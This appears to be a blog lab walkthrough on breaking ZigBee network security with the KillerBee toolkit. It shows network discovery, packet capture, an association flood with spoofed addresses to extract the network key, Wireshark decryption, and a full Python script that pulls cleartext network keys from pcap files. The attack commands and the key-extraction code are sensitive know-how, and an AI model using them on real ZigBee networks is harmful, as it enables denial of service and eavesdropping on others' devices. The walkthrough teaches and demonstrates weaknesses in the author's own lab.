A while ago I wrote an introduction to Josh Wright's KillerBee toolkit. I thought I'd follow up with some information on what we used to set up part of our lab and a walk-through of a few of the tools. We purchased the ETRX3DVKA357 Developers Kit from Telegesis. It contains a number of ZigBee modules, a ZigBee USB adapter, three developer (dev) boards and software.
Following the instructions in the package made it simple to set up. Connect one of the ZigBee modules to a dev board, then connect that board to your computer via USB. Set it to create a PAN, then power on the other dev boards; they should join the PAN automatically. The coordinator generates the network key automatically, and there are a few options in the software that will generate a new key if desired. Clicking the configure button in the Telegesis software adds extra buttons that can be used to control the remote dev boards: you can make the devices beep, read data from their sensors and toggle power to the LEDs. That traffic is what we will capture and decrypt below.
Now the fun part. Install the KillerBee API and tools on a Linux system, plug in two flashed KillerBee USB sticks (one will sniff, the other will transmit) and run the following command:
This lists the device IDs of the attached sticks; they are what the -i option in the commands below expects. To discover the ZigBee network(s), run:
zbstumbler -i DEV1ID
The zbstumbler application will hop across channels 11-26, the 2.4 GHz band of IEEE 802.15.4, sending beacon requests and reporting the PAN ID and channel of every network that answers. Channels 0-10 belong to the sub-GHz (868/915 MHz) bands, which these sticks do not cover, so they are not scanned. Once the CHANNEL and PANID are known, we can perform the packet capture and the association flood. Start the packet capture on the first stick:
zbdump -i DEV1ID -f CHANNEL -w output.pcap
While the zbdump utility is running, you need a device to join the network so that the coordinator sends it the network key. You can either power-cycle one of the dev boards and see whether the key is re-sent when it rejoins, or start the association flood from the second stick, which sends a stream of association requests with spoofed addresses so the coordinator hands out the key to each "new" device (this also fills the coordinator's child table, so only do it in your own lab):
zbassocflood -i DEV2ID -p PANID -c CHANNEL
After approximately 15 seconds, stop the association flood and then stop the zbdump utility (Ctrl-C in each terminal). Check the packet dump for the network key:
If the key was found in the packet capture it will be displayed on the screen. The key is recoverable this way because a device that joins without a preconfigured link key receives the network key in an unencrypted APS Transport Key command; if the Transport Key itself were encrypted under a preconfigured link key, zbdsniff would have nothing to show. Open Wireshark, then open the Edit->Preferences->Protocols->ZigBee NWK panel and insert the key discovered with zbdsniff into the Network Key field (newer Wireshark versions use a Pre-configured Keys table here instead). By default the Security Level is set to AES-128 Encryption, 32-bit Integrity Protection, which is the ZigBee default and should be correct. Now use the Telegesis software to send commands that initiate tones or toggle the LEDs while capturing the ZigBee traffic with zbdump (zbdsniff only reads existing captures; it does not sniff). Load the new pcap into Wireshark and you can analyze the decrypted data. Enjoy.
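To show what "check the packet dump for the network key" actually involves, here is an added example that walks a pcap the way zbdsniff does: it strips the 802.15.4 MAC header, skips anything that is MAC- or NWK-secured, and pulls the key out of any APS Transport Key command that carries a standard network key in the clear. This is my own code, not part of KillerBee, and it uses only the Python standard library. The pcap and the two frames inside it are constructed for the example (a NWK-secured data frame that must be ignored, followed by a coordinator at short address 0x0000 handing the key to a joining device); the key value, IEEE addresses and PAN ID are made up.

```python
import struct
import sys

# ZigBee specification values for the frame we are hunting
APS_CMD_TRANSPORT_KEY = 0x05    # APS command identifier: Transport Key
KEY_TYPE_STANDARD_NWK = 0x01    # key type field: standard network key
DLT_IEEE802_15_4 = 195          # pcap link type: 802.15.4 frames with FCS
DLT_IEEE802_15_4_NOFCS = 230    # same frames with the FCS already stripped
_ADDR_LEN = {0: 0, 2: 2, 3: 8}  # 802.15.4 address-mode value -> address size


def read_pcap(data):
    """Parse a classic pcap file held in memory; return (frames, has_fcs)."""
    magic = struct.unpack_from("<I", data, 0)[0]
    endian = {0xA1B2C3D4: "<", 0xD4C3B2A1: ">"}.get(magic)
    if endian is None:
        raise ValueError("not a classic (non-nanosecond) pcap file")
    linktype = struct.unpack_from(endian + "I", data, 20)[0]
    if linktype not in (DLT_IEEE802_15_4, DLT_IEEE802_15_4_NOFCS):
        raise ValueError("pcap link type %d is not IEEE 802.15.4" % linktype)
    frames, offset = [], 24
    while offset + 16 <= len(data):               # record: ts_sec ts_usec incl_len orig_len
        incl_len = struct.unpack_from(endian + "I", data, offset + 8)[0]
        offset += 16
        frames.append(data[offset:offset + incl_len])
        offset += incl_len
    return frames, linktype == DLT_IEEE802_15_4


def mac_payload(frame, has_fcs=True):
    """Return the payload of an unsecured 802.15.4 data frame, or None."""
    if len(frame) < 3:
        return None
    fcf = struct.unpack_from("<H", frame, 0)[0]
    dst_mode, src_mode = (fcf >> 10) & 3, (fcf >> 14) & 3
    if fcf & 0x7 != 1 or (fcf >> 3) & 1 or 1 in (dst_mode, src_mode):
        return None                           # not data, MAC-secured, or reserved mode
    offset = 3                                # frame control (2) + sequence number (1)
    if dst_mode:
        offset += 2 + _ADDR_LEN[dst_mode]     # destination PAN ID + address
    if src_mode:                              # source PAN ID omitted under PAN compression
        offset += (0 if (fcf >> 6) & 1 else 2) + _ADDR_LEN[src_mode]
    end = len(frame) - 2 if has_fcs else len(frame)
    return frame[offset:end] if offset <= end else None


def nwk_payload(payload):
    """Strip the ZigBee NWK header; return None for secured or non-data frames."""
    if len(payload) < 8:
        return None
    fc = struct.unpack_from("<H", payload, 0)[0]
    if fc & 0x3 != 0 or (fc >> 9) & 1:       # type 0 = data; bit 9 = NWK security on
        return None
    offset = 8                                # fc(2) dst(2) src(2) radius(1) seq(1)
    offset += 1 if (fc >> 8) & 1 else 0       # multicast control
    offset += 8 if (fc >> 11) & 1 else 0      # destination IEEE address
    offset += 8 if (fc >> 12) & 1 else 0      # source IEEE address
    if (fc >> 10) & 1:                        # source route subframe
        if len(payload) <= offset:
            return None
        offset += 2 + 2 * payload[offset]     # relay count, relay index, relay list
    return payload[offset:] if offset <= len(payload) else None


def transport_key(aps):
    """Parse an unsecured APS Transport Key carrying a network key; else None."""
    # Command frame: frame control(1) counter(1) command id(1), then for a
    # network key: key type(1) key(16) key seq(1) dst IEEE(8) src IEEE(8)
    if len(aps) < 37:
        return None
    fc = aps[0]
    if fc & 0x3 != 1 or (fc >> 5) & 1 or (fc >> 7) & 1:
        return None                           # not a command, APS-secured, or ext header
    if aps[2] != APS_CMD_TRANSPORT_KEY or aps[3] != KEY_TYPE_STANDARD_NWK:
        return None
    return {"key": aps[4:20].hex(), "key_seq": aps[20],
            "dst": aps[21:29][::-1].hex(), "src": aps[29:37][::-1].hex()}


def find_network_keys(frames, has_fcs=True):
    """Scan raw 802.15.4 frames; return one record per network key sent in the clear."""
    hits = []
    for index, frame in enumerate(frames):
        mac = mac_payload(frame, has_fcs)
        nwk = nwk_payload(mac) if mac is not None else None
        tk = transport_key(nwk) if nwk is not None else None
        if tk is not None:
            tk["frame"] = index
            hits.append(tk)
    return hits


def build_sample_pcap():
    """Constructed sample, not a real capture: one NWK-secured data frame, then the
    coordinator (0x0000) sending the network key to joining device 0x3f21 in the clear."""
    mac = b"\x41\x88\x2a\x34\x12\x21\x3f\x00\x00"      # data frame, PAN 0x1234, short addrs
    secured = mac + b"\x08\x02\x21\x3f\x00\x00\x1e\x06" + bytes(21) + b"\x00\x00"
    nwk = b"\x08\x00\x21\x3f\x00\x00\x1e\x07"          # NWK data frame, security bit clear
    aps = (b"\x01\x11" + bytes([APS_CMD_TRANSPORT_KEY, KEY_TYPE_STANDARD_NWK])
           + bytes(range(0x10, 0x20)) + b"\x00"       # made-up key, key sequence 0
           + b"\x21\x43\x65\x87\x09\x21\x43\x65" + b"\x08\x07\x06\x05\x04\x03\x02\x01")
    keyed = mac + nwk + aps + b"\x00\x00"             # dummy FCS, not verified here
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, DLT_IEEE802_15_4)
    for frame in (secured, keyed):
        out += struct.pack("<IIII", 0, 0, len(frame), len(frame)) + frame
    return out


if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_pcap()
    for hit in find_network_keys(*read_pcap(data)):
        print("frame %(frame)d: network key %(key)s (seq %(key_seq)d) %(src)s -> %(dst)s" % hit)
```

Run it with no arguments to scan the built-in sample, or with the path of a zbdump capture to scan that; the printed key goes straight into the Wireshark preference. The three "return None" checks on security bits are the point of the exercise: a network that transports its key under a preconfigured link key produces frames that fail the APS-security check, and the script, like zbdsniff, finds nothing.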